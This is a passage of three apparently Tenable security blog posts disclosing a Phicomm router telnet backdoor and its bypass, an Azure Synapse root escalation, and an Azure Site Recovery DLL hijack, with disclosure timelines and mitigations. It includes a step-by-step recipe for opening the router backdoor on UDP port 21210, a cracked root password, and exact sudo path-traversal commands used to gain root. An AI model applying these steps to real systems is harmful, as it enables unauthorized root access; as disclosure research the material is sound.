This seems to establish beyond any doubt that the most recent firmware versions for Phicomm’s K2G and K3C routers are using a new backdoor protocol, designed with better security but implemented with a catastrophic loophole, which permits anyone on the LAN to gain a root shell on either device.

The Phicomm K3C with International Firmware Version 33.1.25.177

Still unsure whether I’d tested the most recent versions of the Phicomm K3C firmware, or whether I’d find the same backdoor in the devices they’d built for the international market, I was eager to get my hands on a brand new K3C device. It arrived just as I was wrapping up with my K3C emulations.

I set up the router and found that the firmware running on this device bore the version 33.1.25.177, a major version bump ahead of the latest Chinese market firmware I’d tested.

The web admin interface for the international release of the K3C, running firmware version 33.1.25.177.

There was something listening on UDP port 21210, but it didn’t, at first, appear to behave like the backdoor I’d found on the Chinese market firmware I’d studied. Rather than listening silently until it received the magic handshake, ABCDEF1234, it would respond to any packet with an unpredictable, high-entropy packet containing exactly 128 bytes. I suspected this might be something like the encrypted secret that the backdoor would send to its client in Stage 2 of the protocol discussed above.

The behaviour was reminiscent of the simpler backdoor that the tool RoutAckProV1B2.exe seemed designed for, but I wasn’t able to get anywhere with that particular tool.

I figured I could make better sense of things if I could just look at the binary of whatever it was that listened on UDP port 21210 on this device, so I set to work taking it apart, in search of a UART port by which I might obtain a root shell.

I was in luck! The device not only sports a UART, but a clearly-labelled UART at that!

A clearly labelled UART at that!

So I grabbed my handy-dandy UART-to-USB serial bridge…

My handy-dandy UART-to-USB bridge.

…and set about soldering some header pins to the UART port. These devices are somewhat delicate machines, so I first tried to get as far as I could without disassembling everything and removing it from the casing. A hot air gun was helpful here.

And there we go:

UART pins ready!

The molten plastic casing was still a bit awkward to work around, however, so I did eventually end up taking things apart, and removing the unneeded upper board, which housed the RF components. Everything still worked fine.

With the UART adapter connected, I was able to obtain a serial connection using minicom, at 115200 Baud 8N1. This gave me access to a U-Boot BIOS shell after interrupting the boot process, with direct read and write access to the 1Gb F-die NAND flash storage chip (a Samsung 734 K9F1G08U0F SCB0), on which both the firmware and the bootloader are stored.

The Samsung 734 K9F1G08U0F SCB0.

If we let the boot process run its course, we’re presented with a linux login prompt. We could try to guess the password here, or take the more difficult, principled approach of first dumping the NAND and searching it for clues. Let’s do things the hard way. I adapted Valerio’s TCL expect script to hexdump the entire NAND volume, and left it running overnight.

Valerio’s U-Boot flash dumping script, adapted to work on the K3C.

I deserialized the hex back to binary with a bit of Python, and then went at it with the usual tools. The most rewarding turned out to be strings:

Digging some password hashes out of the NAND volume.
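
The hex-to-binary step mentioned above might look something like the following. This is a sketch, not the script actually used: the line format is an assumption (U-Boot `md.b`-style output, with an 8-digit address, a colon, up to 16 hex bytes, and an ASCII column), and `hexdump_to_bytes` is a hypothetical name. The sample log is made up for illustration.

```python
import re

# Assumed line shape: an 8-digit hex address, a colon, up to 16
# space-separated hex bytes, then an ASCII column that we ignore.
LINE_RE = re.compile(r"^([0-9a-fA-F]{8}):((?: [0-9a-fA-F]{2}){1,16})")


def hexdump_to_bytes(log_text: str) -> bytes:
    """Rebuild binary data from captured hexdump lines, skipping other output."""
    out = bytearray()
    for line in log_text.splitlines():
        match = LINE_RE.match(line.strip())
        if match is None:
            continue  # prompts, command echoes, and blank lines
        out += bytes.fromhex(match.group(2).replace(" ", ""))
    return bytes(out)


# Made-up sample capture, for illustration only.
sample = (
    "=> md.b 0x80000000 0x20\n"
    "80000000: 27 05 19 56 00 01 02 03 04 05 06 07 08 09 0a 0b    '..V............\n"
    "80000010: 68 73 71 73 10 11 12 13 14 15 16 17 18 19 1a 1b    hsqs............\n"
)
data = hexdump_to_bytes(sample)
assert len(data) == 32
assert data[:4] == bytes.fromhex("27051956")
```

A more careful version would also compare each line's address against the running offset, so that lines dropped by the serial link are detected rather than silently skipped.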

Hashcat didn’t have any trouble with this, and gave me one of the root passwords in seconds:

Returning to the login prompt while hashcat warmed up my office, I logged in with username root, password admin, and presto!

The firmware conveniently had netcat installed, and our old friend telnetd_startup was sitting right there in /usr/bin. I piped it over to my workstation, and dropped it into Ghidra.

The protocol implemented by the version of telnetd_startup in the latest international market firmware for the K3C closely resembles what we see in the Chinese market K2G 22.6.3.20 and the K3C 32.1.46.268. It differs only in omitting the initial stage. Rather than waiting for the ABCDEF1234 handshake, and then responding with a device identifying hash, it expects the initial packet to contain a message encrypted with the private RSA key that matches its hardcoded public key. It “decrypts” this message with the public key, XORs it with a randomly generated 31-character secret, and then, fatally, concatenates it with either +TEMP or +PERM using sprintf(), before hashing the result with MD5, to produce the ephemeral passwords for temporarily and permanently activating the telnet service respectively.

This all looks very familiar.
A familiar-looking xor() function in the international firmware for the K3C.
And here’s where they make their fatal mistake.

This algorithm is vulnerable to the same attack that worked against the three-stage backdoor protocol implemented in the telnetd_startup versions we’ve already looked at. All we need to do is grab the hardcoded public key and tweak our lockpick tool so that it skips the handshake/identifier stage when communicating with this particular release.

That public key, by the way, is

CC232B9BB06C49EA1BDD0DE1EF9926872B3B16694AC677C8C581E1B4F59128912CBB92EB363990FAE43569778B58FA170FB1EBF3D1E88B7F6BA3DC47E59CF5F3C3064F62E504A12C5240FB85BE727316C10EFF23CB2DCE973376D0CB6158C72F6529A9012786000D820443CA44F9F445ED4ED0344AC2B1F6CC124D9ED309A519

Remember that one.

I made the necessary adjustments to the tool, and it worked, again, like a charm!

An Exposed Private RSA Key in the K2 Router, with Firmware Version 22.5.9.163, but One that You Don’t Even Need

I mentioned, before, that another solution to this puzzle would simply be to obtain the private RSA key that matched the hardcoded public key. In the case of the K2G (the one in Wavlink’s clothing) I made some effort to search for the public key online, after converting it to various ASCII formats, just in case the pair had been left lying around somewhere. It was a long shot and didn’t pan out. But while I was exploring one of the older firmware images for Phicomm’s K2 line of routers (22.5.9.163, dating from 2017), I noticed something interesting:

Look familiar?

It’s using the same public key we saw in the brand new international release of the Phicomm K3C. But there’s more:

That shouldn’t be there!

In firmware version 22.5.9.163 for the K2 router, Phicomm exposed the private RSA key corresponding to the hardcoded public key that they continued to deploy in their international release long after correcting the error in their domestic market firmware versions. This error didn’t go unnoticed — this key pair shows up in a strings dump of RoutAckProV1B2.exe, which attacks an earlier, simpler backdoor protocol than either of the two protocols analysed here.

The method for constructing the ephemeral passwords in the K2 22.5.9.163 differs from what we’ve seen in these later firmware versions. Instead of generating a random secret and XORing it with public-key-decrypted data received from the client prior to concatenating it with the two magic salts, this earlier release simply concatenates the client’s decrypted secret with the salts. Everything is then hashed with MD5, just as it was before, and the two passwords are set.

The md5_command() function from the telnetd_startup binary in the K2 22.5.9.163 firmware.

Curiously, this release contains what must be a typo: instead of +PERM we have +PERP.

Now, leaked d parameter notwithstanding, it’s possible to crack open this backdoor without even using the private key. All that needs to be done is:

  1. Generate some ${phony_ciphertext} that the known public key will “decrypt” into a non-null buffer (call this the ${phony_plaintext}). It simplifies things if you also constrain things so that the phony plaintext contains no null bytes. This can be found pretty quickly through brute trial and error.
  2. Take the MD5 hash of the string ${phony_plaintext}+TEMP. Let’s call that the ${temp_password}.
  3. Send ${phony_ciphertext} to UDP port 21210 on the router.
  4. And then, quickly afterwards, send ${temp_password} to the same port.

This will open the telnet service on the K2 22.5.9.163. For a telnet service that persists after rebooting, do the same as above but substitute PERP for TEMP (this misspelling seems to be peculiar to this particular version).
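
The offline part of that recipe (steps 1 and 2) can be sketched in Python. Everything specific here is an assumption for illustration: the modulus is a random stand-in rather than the real key, the exponent 65537 is a guess at a common default, `hashlib.md5` stands in for the firmware's MD5 routines, and the function names are hypothetical.

```python
import hashlib
import secrets


def find_phony_pair(n: int, e: int, size: int = 128):
    """Search for a ciphertext whose unpadded public-key "decryption"
    contains no null bytes, so that %s-style formatting keeps all of it."""
    while True:
        c = secrets.randbelow(n - 2) + 2  # keep 2 <= c < n
        plaintext = pow(c, e, n).to_bytes(size, "big")
        if b"\x00" not in plaintext:
            return c.to_bytes(size, "big"), plaintext


def salted_md5(phony_plaintext: bytes, salt: bytes) -> bytes:
    """MD5 over plaintext + salt, as described in step 2."""
    return hashlib.md5(phony_plaintext + salt).digest()


# Stand-in parameters for illustration only: a random odd 1024-bit number
# in place of the real modulus, and an assumed exponent of 65537.
demo_n = secrets.randbits(1024) | (1 << 1023) | 1
demo_e = 65537

phony_ciphertext, phony_plaintext = find_phony_pair(demo_n, demo_e)
temp_password = salted_md5(phony_plaintext, b"+TEMP")
perm_password = salted_md5(phony_plaintext, b"+PERP")  # sic, per this release
```

Since a random 128-byte value avoids null bytes a little over half the time, the search loop usually finishes within a handful of iterations.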

A Reconstructed History of Phicomm’s Backdoor Protocols

In the course of researching this vulnerability, I’ve looked closely at eleven different firmware images. Arranged in order of build date, they are:

So, to sum things up, the history of the Phicomm backdoor looks like this:

The oldest generation I’ve found of Phicomm’s telnetd_startup protocol (shaded blue, in the tables above) is relatively simple: the server waits to receive an encrypted message, which it decrypts and hashes with two different salts. It then waits for another message, and if that message matches either of those hashes, it will either spawn the telnet service or write a flag to the flash drive to trigger the spawning of telnet on boot. This is the protocol we see in the K2 22.5.9.163, released in early 2017. That particular build made the blunder of hardcoding the private key in the binary, which defeats the purpose of asymmetric encryption. This error enabled the creation of RoutAckProV1B2.exe, a router-hacking tool which has been circulating online for several years, which uses the pilfered private key to allow any interested party to gain root access to this iteration of the backdoor. Of course, as we just saw, use of the private key isn’t even necessary to open the door. What the design overlooks — and this oversight will never be truly corrected — is that it’s not only possible but easy to generate phony ciphertext that a public RSA key will “decrypt” into predictable, phony plaintext. Doing so will permit an attacker to subvert the locking mechanism on the backdoor, and gain unauthorized entry.

Phicomm responded to this situation in an entirely insufficient fashion in the next generation of the protocol (shaded yellow, above), which we find in the firmware versions released later in 2017, including the still-for-sale international release of the K3C (analysed above). They redacted the private key from the binary, but failed to change the public key. Their next design, moreover, appears to share the assumption that it’s only by encrypting data with the private key that an attacker can predict or control the output of its public key decryption. Rather than addressing either of these errors, they just piled on further complexity: this is when they began to generate a 31-character random secret and XOR it with the public-key-decrypted data received from the client in order to generate their ephemeral passwords. This makes the backdoor slightly harder to attack, if we continue to ignore the leaked private key, but it’s ultimately just a matter of discovering some phony ciphertext that decrypts to a plaintext that begins with a printable ASCII character. This gives us a 1 in 94 chance of colliding with the first byte of the random secret, which, due to the careless use of sprintf’s %s specifier for bytearray concatenation, will result in a completely predictable ephemeral password.

The next generation (mauve in the tables above) is the last I looked at, and likely the last released. Phicomm finally removed the compromised public key, and took the additional precaution of deploying a distinct public key to each router model. They also added a device-identifying handshake phase to the protocol, which makes the backdoor considerably stealthier — there’s no real way to tell that it’s listening on UDP port 21210, unless you send it the magic token ABCDEF1234. It responds to this magic token with a device-identifying hash, permitting the client to select the private key that matches the public key compiled into the service. The algorithm itself, however, shares the same security flaws as its predecessor, and is vulnerable to an essentially identical attack. This is the iteration we see in the Chinese market release of K3C 32.1.46.268, and the Chinese market K2G A1 22.6.3.20 — the firmware image that ended up on certain Wavlink-branded routers, that Wavlink neglected to flash with firmware of their own.

I’d love to conduct a more exhaustive test of various Phicomm firmware images, but they’re becoming rather difficult to find online. If you know where I might find a copy of a firmware version not mentioned here, please reach out to us at bughunters at tenable dot com.

Will these Vulnerabilities Ever Be Patched?

No.

These vulnerabilities will never be patched. Certainly not through official channels.

The Phicomm corporation is dead and gone.

After various attempts to contact Phicomm’s customer support offices in China, Germany, and California, and even reaching out to the CEO directly, I received this reply on October 10 from whatever remained of Phicomm’s German office.

Dear Sir,
Thank you for contacting Phicomm Support in Germany. Phicomm has closed all Business worldwide since 01.01.2019.
Yours sincerely
Service Team Phicomm

I’m not sure whether or not the @PHICOMM account on telegram.com is managed by the company, but if it is, things didn’t look good on that end, either.

Poor guy.

So, what exactly happened to Phicomm?

In 2015, while at the height of their economic power — with a net operating income of close to 10 billion yuan (a little over 1.5 billion USD), earning them comparisons to Huawei in the press — Phicomm, under the leadership of CEO and founder Gu Guoping, entered into a highly questionable business arrangement with the p2p lending company, Lianbi Financial. Former Project Director for Phicomm, James Soh, has posted on LinkedIn about

the sudden appearance in June 2015 of a person-to-person (P2P) financial service company called LianBi Finance that started month-long on-site promotion on company grounds. They claimed that LianBi Finance is a partner firm and there is proper agreement in place for collaboration between Shanghai Phicomm and LianBi Finance but it was never publicized. They promote financial products that has unrealistic returns. Thereafter, the tie-up between Shanghai Phicomm and LianBi Finance went further where Shanghai Phicomm home Wifi kit costing 399 RMB and up, shall be refunded by LianBi Finance for the full amount if the buyer scanned the QR code on the Wifi product box and provided personal details. People will buy more and more sets, however discovered that they cannot get the full amount back from the second set of kit they bought, instead they are offered to purchase a certain amount of financial investment products of say 5,000 RMB, and returns of 12% per month will be credited back into the buyer. This is a pyramid scheme in disguise. In addition, Mr Gu tied staff promotion and bonus in Shanghai Phicomm to how much LianBi products each person buy.
Gu Guoping, in better days than these.

Peer-to-peer (P2P) lending is a high-risk financial instrument that often offers investors (that is, lenders) astonishingly high rates of return, and which has been criticized for being a Ponzi scheme with extra steps. It would eventually become known that Gu “effectively also owned and controlled LianBi.” 2016 saw the beginnings of the Chinese government’s crackdown on P2P lending platforms, in a campaign that would reach its summit in 2018. A case was filed against LianBi Financial that year, under suspicion of “illegally absorbing public deposits.” In 2021, the police raided LianBi’s offices and arrested Gu Guoping.

Police raiding the LianBi Financial headquarters.

A public hearing was held against Gu on February 4, that year, and on December 8, 2021,

Gu Guoping was sentenced to life imprisonment for the crime of fundraising fraud, deprived of political rights for life, and confiscated all personal property. Nong Jin, Chen Yu, Zhu Jun, Wang Jingjing, and Zhang Jimin were sentenced to fixed-term imprisonment ranging from 15 to 10 years for the crime of fund-raising fraud, as well as confiscation of personal property of RMB 5 million to 600,000.
Gu Guoping, together with a few of his associates, at a public hearing in the Shanghai №1 Intermediate People’s Court, on February 4, 2021. The yellow sign says “defendant”.

And this, in a nutshell, is why we can expect no patches from Phicomm for the vulnerabilities discussed in this post.

So, what about Wavlink?

This part of the story is still a little unclear, but it seems to me that what happened was this: sometime between May, 2018, when they released their last batch of routers, and January 2019, when they closed down business worldwide, Phicomm liquidated their remaining stock of routers, selling the surplus K2Gs to the Winstars corporation. Winstars then outfitted these devices with the branding of their subsidiary, Wavlink, and distributed them through Amazon, which is how a Phicomm router in Wavlink clothing eventually arrived on my desk.

After hitting a wall with Phicomm, I reached out to Wavlink to report these vulnerabilities I’d found on what was, in a sense, their hardware. I imagined that they’d be interested to hear that they had been shipping out devices with Phicomm’s firmware. They replied that they had “released related patches last year or the beginning of this year,” but gave no indication as to how the customer might be able to upgrade to those patches if they were among those whose Wavlink-branded routers were running Phicomm firmware.

If removing the backdoor is your chief concern, then it’s far from given that re-flashing your router with Wavlink firmware would put you on any firmer ground. Wavlink, in fact, has its own history of installing backdoors. And shoddy or not, at least Phicomm made an effort to lock their backdoors. If you’re interested in reading more about Wavlink’s own backdoors, I recommend you read James Clee’s excellent writeup.

What Should I Do With my Phicomm Router?

There no longer exists an official avenue to update the firmware on any Phicomm router. The company collapsed entirely well before we discovered these zero days.

An intrepid user can, however, at their own risk, leverage one or more of the vulnerabilities documented above to re-flash their router with an open-source firmware like OpenWRT, which now supports several Phicomm models. There’s considerable risk of bricking your device in the process, and it isn’t for the faint of heart, but it’s quite probably the surest way to rid your router of the vulnerabilities analysed here.

Other creative solutions, available to the adventurous, might include using the backdoor to modify the firmware by hand, for example by disabling the telnetd_startup daemon. The user might also attempt to simply restrict access to UDP port 21210 by means of a firewall rule.

Remote management should be disabled immediately, if nothing else.

Disclosure Timeline

  • Tuesday, October 5, 2021: Phicomm customer support contacted to report vulnerabilities
  • Sunday, October 10, 2021: Phicomm’s German office replies to inform us that Phicomm “has closed all business worldwide since 01.01.2019.”
  • Thursday, October 7, 2021: Wavlink notified that several of their “AC1200” routers have shipped with vulnerable Phicomm firmware
  • Friday, October 8, 2021: Wavlink responds to request further details
  • Friday, October 29, 2021: Wavlink provided with requested details
  • Monday, December 6, 2021: Reminder sent to Wavlink after receiving no response

A Backdoor Lockpick was originally published in Tenable TechBlog on Medium, where people are continuing the conversation by highlighting and responding to this story.

Microsoft Azure Synapse Pwnalytics

Synapse Analytics is a platform used for machine learning, data aggregation, and other such computational work. One of the primary developer-oriented features of this platform is the use of Jupyter notebooks. These are essentially blocks of code that can be run independently of one another in order to analyze different subsets of data.

Synapse Analytics is currently listed under Microsoft’s high-impact scenarios in the Azure Bug Bounty program. Microsoft states that products and scenarios listed under that heading have the highest potential impact to customer security.

Synapse Analytics utilizes Apache Spark for the underlying provisioning of clusters that user code is run on. User code in these environments is run with intentionally limited privileges because the environments are managed by internal Microsoft subscription IDs, which is generally indicative of a multi-tenant environment.

Tenable Research has discovered a privilege escalation flaw that allows a user to escalate privileges to that of the root user within the context of a Spark VM. We have also discovered a flaw that allows a user to poison the hosts file on all nodes in their Spark pool, which allows one to redirect subsets of traffic and snoop on services users generally do not have access to. The full privilege escalation flaw has been adequately addressed. However, the hosts file poisoning flaw remains unpatched at the time of this writing.

Many of the keys, secrets, and services accessible via these attacks have traditionally allowed further lateral movement and potential compromise of Microsoft-owned infrastructure, which could lead to a compromise of other customers’ data as we’ve seen in several other cases recently, such as Wiz’s ChaosDB or Orca’s AutoWarp. For Synapse Analytics, however, access by a root user is limited to their own Spark pool. Access to resources outside of this pool would require additional vulnerabilities to be chained and exploited. While Tenable remains skeptical that cross-tenant access is not possible with the elevated level of access gained by exploitation of these flaws, the Synapse engineering team has assured us that such a feat is not possible.

Tenable has rated this issue as Critical severity based on the context of the Spark VM itself. Microsoft considers this issue a Low severity defense-in-depth improvement based on the context of the Synapse Analytics environment as a whole. Microsoft states that cross-tenant impact of this issue is unlikely, if not impossible, based on this vulnerability alone.

We’ll get to the technical bits soon, but let’s first address some disclosure woes. When it comes to Synapse Analytics, Microsoft Security Response Center (MSRC) and the development team behind Synapse seem to have a major communications disconnect. It took entirely too much effort to get any sort of meaningful response from our case agent. Despite numerous attempts at requesting status updates via emails and the researcher portal, it wasn’t until we reached out via Twitter that we would receive responses. During the disclosure process, Microsoft representatives initially seemed to agree that these were critical issues. A patch for the privilege escalation issue was developed and implemented without further information or clarification being required from Tenable Research. This patch was also made silently and no notification was provided to Tenable. We had to discover this information for ourselves.

During the final weeks of the disclosure process, MSRC began attempting to downplay this issue and classified it as a “best practice recommendation” rather than a security issue. Their team stated the following (typos are Microsoft’s): “[W]e do not consider this to be a important severity security issue but rather a better practice.” If that were the case, why can snippets like the following be found throughout the Spark VMs?

It wasn’t until we notified MSRC of the intent to publish our findings that they acknowledged these issues as security-related. At the eleventh hour of the disclosure timeline, someone from MSRC was able to reach out and began rectifying the communication mishaps that had been occurring.

Unfortunately, communication errors and the downplaying of security issues in their products and cloud offerings is far from uncommon behavior for MSRC as of late. For a few more recent examples where MSRC has failed to adequately triage findings and has acted in bad faith towards researchers, check out the following research articles:

The Flaws

Privilege Escalation

The Jupyter notebook functionality of Synapse runs as a user called “trusted-service-user” within an Apache Spark cluster. These compute resources are provisioned to a specific Azure tenant, but are managed internally by Microsoft. This can be verified by viewing the subscription ID of the nodes on the cluster (only visible with elevated privileges and the Azure metadata service). This is indicative of a multi-tenant environment.

Not our subscription ID

This “trusted-service-user” has limited access to many of the resources on the host and is intentionally unable to interact with “waagent,” the Azure metadata service, the Azure WireServer service, and many other services only intended to be accessed by the root user and other special accounts end-users do not normally have access to.

That said, the trusted-service-user does have sudo access to a utility that is used to mount file shares from other Azure services:

The above screenshot shows that the Jupyter notebook code is running as the “trusted-service-user” account and that it has sudo access to run a particular script without requiring a password.

The filesharemount.sh script happens to contain a handful of flaws that, when combined, can be used to escalate privileges to root. The full text has been omitted from this section for brevity, but relevant bits are highlighted below.

#!/bin/bash
#
# NodeAgent installation script.
#
# Maintained by [email protected].
# Copyright © Microsoft Corporation. All rights reserved.
#
# this script use cifs to mount fileshare, will be deprecated once we implement fuse driver to mount fileshare
SCRIPT_DIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" >/dev/null 2>&1 && pwd )"
source ${SCRIPT_DIR}/functions.sh
...

First and foremost, this script is clearly temporary and has likely not undergone strict review as indicated by the deprecation warning. Additionally, it appears that several functions are sourced from a “functions.sh” file in the same directory.

The functions provided by “functions.sh” are used for sanity checks throughout the main script. For example, the following is used to determine if a given mount point is valid before attempting to unmount it:

...
if [ "$commandtype" = "unmount" ]; then
    check_if_is_valid_mount_point_before_unmount $args
    umount $args
    rm -rf $args
    exit 0
fi
...

Moving on, the end of the main script is where we find the good stuff:

...
chown -R ${TRUSTED_SERVICE_USER}:${TRUSTED_SERVICE_USER} "$mountPoint"
uid=$(id -u ${TRUSTED_SERVICE_USER})
gid=$(id -g ${TRUSTED_SERVICE_USER})
mount -t cifs //"$account".file.core.windows.net/"$fileshare" "$mountPoint" -o vers=3.0,uid=$uid,gid=$gid,username="$account",password="$accountKey",serverino
if [ "$?" -ne "0" ]; then
    check_if_deletable_folder "$mountPoint"
    rm -rf "$mountPoint"
    exit 1
fi

Another of the check functions from functions.sh is used above, but this time the check is keyed off successfully running the mount command a few lines earlier. If the mount command fails, the mount point is deleted. By providing a mount point that passes all sanity checks to this point and that has invalid file share credentials, we can trigger the “rm” command in the above snippet. Let’s use it to get rid of the functions.sh file, and thus, all of the sanity check functions.

Full command used for file deletion:

sudo -u root /usr/lib/notebookutils/bin/filesharemount.sh mount mountPoint:/synfs/../../../usr/lib/notebookutils/bin/functions.sh source:https://[email protected] accountKey:invalid 2>&1

The functions.sh file only checks that the mountPoint begins with “/synfs” before determining that it is valid. This allows a simple directory traversal attack to bypass that function.
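To make the weakness concrete, here is a small Python sketch contrasting a prefix-only check with one that normalizes the path first. This is not Microsoft's code; the function names are hypothetical, and the prefix check simply models the behavior described above.

```python
import posixpath

ALLOWED_ROOT = "/synfs"


def naive_is_valid(mount_point):
    """Prefix-only check, modelling the behavior described for functions.sh."""
    return mount_point.startswith(ALLOWED_ROOT)


def normalized_is_valid(mount_point):
    """Collapse '..' segments first, then require the result to stay under the root."""
    resolved = posixpath.normpath(mount_point)
    return resolved == ALLOWED_ROOT or resolved.startswith(ALLOWED_ROOT + "/")


payload = "/synfs/../../../usr/lib/notebookutils/bin/functions.sh"
print(naive_is_valid(payload))       # True: the traversal slips through
print(normalized_is_valid(payload))  # False: the path resolves outside /synfs
```

Note that normpath only collapses the path lexically. A hardened check would likely also resolve symlinks (for example with os.path.realpath) before comparing against the allowed root.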

Now we can bypass all checks from functions.sh, remove the existing filesharemount.sh utility, and mount our own in the same directory, which still has sudo access. We created a test share using the Gen2 Storage service within Azure. We created a file in this share called “filesharemount.sh” with the contents being “id”. This allows us to demonstrate the execution privileges now granted to us.

Our mount command looks like this:

sudo -u root /usr/lib/notebookutils/bin/filesharemount.sh mount mountPoint:/synfs/../../../usr/lib/notebookutils/bin/ source:https://[email protected] accountKey:REDACTED 2>&1

Let’s check our access now:

Hosts File Poisoning

There exists a service on one of the hosts in each Spark pool called “HostResolver.” To be specific, it can be found at “/opt/microsoft/Microsoft.Analytics.Clusters.Services.HostResolver.dll” on each of the nodes in the Synapse environment. This service is used to manage the “hosts” file for all hosts in the Spark cluster. This supports ease-of-management — administrators can send commands to each host by a preset hostname, rather than keeping track of IP addresses, which can change based on the scaling features of the pool.

Due to the lack of any authentication features, a low-privileged user is able to overwrite the “hosts” file on all nodes in their Spark pool, which allows them to snoop on services and traffic they otherwise are not intended to be able to see. To be clear, this isn’t any sort of game-changing vulnerability or of any real significance on its own. We do believe, however, that this flaw warrants a patch due to its potential as a critical piece of a greater exploit chain. It’s also just kinda fun and interesting.

For example, here’s a view of the information used by each host:

Output:

The hostresolver can be queried like this:

What happens when a new host is added to the pool? Well, a register request is sent to the hostresolver, which parses the request, and then sends out an update to all other hosts in the pool to update their hosts file. If the entry already exists, it is overwritten.

This register request looks like this:

The updated hosts file looks like this:

This change is propagated to all hosts in the pool. As there is no authentication to this service, we can arbitrarily modify the hosts file on all nodes by manually submitting register requests. If these hosts were provisioned under our subscription ID in Azure, this wouldn’t be an issue since we’d already have full control of them. Since we don’t actually own these hosts, however, this is a slightly bigger problem.
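The behavior described above can be modelled with a toy class. This is purely an illustration of the logic (register, overwrite, propagate, no caller check); the class, hostnames, and addresses are hypothetical and have nothing to do with the real HostResolver wire format.

```python
class ToyHostResolver:
    """Toy model: keeps one hosts table and pushes it to every node on each update."""

    def __init__(self, nodes):
        self.entries = {}                               # hostname -> IP address
        self.node_hosts = {name: {} for name in nodes}  # per-node copy of the table

    def register(self, hostname, ip):
        # No caller identity is checked here; that is the flaw being modelled.
        self.entries[hostname] = ip                     # an existing entry is overwritten
        for hosts in self.node_hosts.values():
            hosts.clear()
            hosts.update(self.entries)


resolver = ToyHostResolver(["node-a", "node-b"])
resolver.register("storage-service", "10.0.0.5")    # legitimate registration
resolver.register("storage-service", "10.0.0.66")   # low-privileged user re-registers the name
print(resolver.node_hosts)
```

After the second call, every node in the model resolves the service name to the address chosen by the low-privileged caller, which is the essence of the poisoning.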

When we originally reported this issue, communicating to hosts outside of one’s own Spark pool was possible. We assume that was a separate issue as it was fixed during the course of our own research and not publicly disclosed by Microsoft. This new inability to communicate outside of our own pool severely limits the impact of this flaw by itself, now requiring other flaws in order to achieve greater impact. At the time of this writing, the hosts file poisoning flaw remains unpatched.

Key Takeaways

Patching in cloud environments is largely out of end-users’ control. Customers are entirely beholden to the cloud providers to fix reported issues. The good news is that once an issue is fixed, it’s fixed. Customers generally don’t have any actions to take since everything happens behind the scenes.

The bad news, however, is that the cloud providers rarely provide notice that a security-related flaw was ever present in the first place. Cloud vulnerabilities rarely receive CVEs because they aren’t static products. They are ever-changing beasts with no accountability requirements in terms of notifying users and customers of security-related changes.

It doesn’t matter how good any given vendor’s software supply chain is if there are parts of the process or product that don’t rely on it. For example, the filesharemount.sh script (and other scripts discovered on these hosts) have very clear deprecation warnings in them and don’t appear to be required to go through the normal QA channels. Chances are this was a temporary script to enable necessary functionality with the intention of replacing it sometime down the line, but that sometime never arrived and it became a fairly critical component, which is a situation any software engineer is all too familiar with.

Additionally, the volatility of these environments, combined with strict Rules of Engagement and changes happening over the course of one’s research, makes it difficult for security researchers to accurately gauge the impact of their findings.

For example, in the hosts file poisoning vulnerability discussed in this blog, we noticed that we were able to change the hosts files in pools outside of our own, but this was fixed at some point during the disclosure process by introducing more robust firewalling rules at the node-level. We also noticed many changes happening with certain features of the service throughout our research, which we now know was the doing of the good folks at Orca Security during their SynLapse research.

On a final note, while we respect the efforts of researchers that go the extra mile to compromise customer data and internal vendor secrets, we believe it’s in everyone’s best interest to adhere to the rules set forth by each of the cloud vendors. Since there are so many moving pieces in these environments and likely many configurations outsiders are not privy to, violating these rules of engagement could have unintended consequences we’d rather not be responsible for. This does, however, introduce a sort of Catch-22 for researchers where the vendor can claim that a disclosure report does not adequately demonstrate impact, but also claim that a researcher has violated the rules of engagement if they do take the extra steps to do so.

For more information regarding these issues and their disclosure timelines, please see the following Tenable Research Advisories:


Microsoft Azure Synapse Pwnalytics was originally published in Tenable TechBlog on Medium, where people are continuing the conversation by highlighting and responding to this story.

Microsoft Azure Site Recovery DLL Hijacking

Azure Site Recovery is a suite of tools aimed at providing disaster recovery services for cloud resources. It provides utilities for replication, data recovery, and failover services during outages.

Tenable Research has discovered that this service is vulnerable to a DLL hijacking attack due to incorrect directory permissions. This allows any low-privileged user to escalate to SYSTEM level privileges on hosts where this service is installed.

Microsoft has assigned this issue CVE-2022-33675 and rated it a severity of Important with a CVSSv3 score of 7.8. Tenable’s advisory can be found here. Microsoft’s post regarding this issue can be found here. Additionally, Microsoft is expected to award a $10,000 bug bounty for this finding.

The Flaw

The cxprocessserver service runs automatically and with SYSTEM level privileges. This is the primary service for Azure Site Recovery.

Incorrect permissions on the service’s executable directory (“E:\Program Files (x86)\Microsoft Azure Site Recovery\home\svsystems\transport\”) allow new files to be created by normal users. Please note that while the basic permissions show that “write” access is disabled, the “Special Permissions” still incorrectly grant write access to this directory. This can be verified by viewing the “Effective Access” granted to a given user for the directory in question, as demonstrated in the following screenshot.

This permissions snafu allows for a DLL hijacking/planting attack via several libraries used by the service binary.
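Because the basic permissions view can be misleading here, the most direct way for a defender to audit a service directory is to try creating a file in it as a low-privileged user. Below is a minimal sketch of such a check; the function name is hypothetical and this is not how Tenable verified the issue.

```python
import os
import tempfile


def can_create_files(directory):
    """Return True if the current user can actually create a file in directory."""
    try:
        fd, path = tempfile.mkstemp(prefix="perm_probe_", dir=directory)
    except OSError:
        # Missing directory or denied access both land here.
        return False
    os.close(fd)
    os.remove(path)  # clean up the probe file
    return True
```

Run as a standard user against the transport directory mentioned above, a `True` result would indicate that the effective permissions allow planting files next to the service binary.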

Proof of Concept

For brevity, we’ve chosen to leave full exploitation steps out of this post since DLL hijacking techniques are extremely well documented elsewhere.

A malicious DLL was created to demonstrate the successful hijack via procmon.

Under normal circumstances, the loading of ktmw32.dll looks like the following:

With our planted DLL, the following can be observed:

This allows an attacker to elevate from an arbitrary, low-privileged user to SYSTEM. During the disclosure process, Microsoft confirmed this behavior and has created patches accordingly.

Conclusion

DLL hijacking is quite an antiquated technique that we don’t often come across these days. When we do, impact is often quite limited due to lack of security boundaries being crossed. MSRC lists several examples in their blog post discussing how they triage issues that make use of this technique.

In this case, however, we were able to cross a clear security boundary and demonstrated the ability to escalate a user to SYSTEM level permissions, which shows the growing trend of even dated techniques finding a new home in the cloud space due to added complexities in these sorts of environments.

As this vulnerability was discovered in an application used for disaster recovery, we are reminded that had this been discovered by malicious actors, most notably ransomware groups, the impact could have been much wider reaching. Ransomware groups have been known to target backup files and servers to ensure that a victim is forced into paying their ransom and unable to restore from clean backups. We strongly recommend applying the Microsoft supplied patches as soon as possible to ensure your existing deployments are properly secured. Microsoft has taken action to correct this issue, so any new deployments should not be affected by this flaw.


Microsoft Azure Site Recovery DLL Hijacking was originally published in Tenable TechBlog on Medium, where people are continuing the conversation by highlighting and responding to this story.

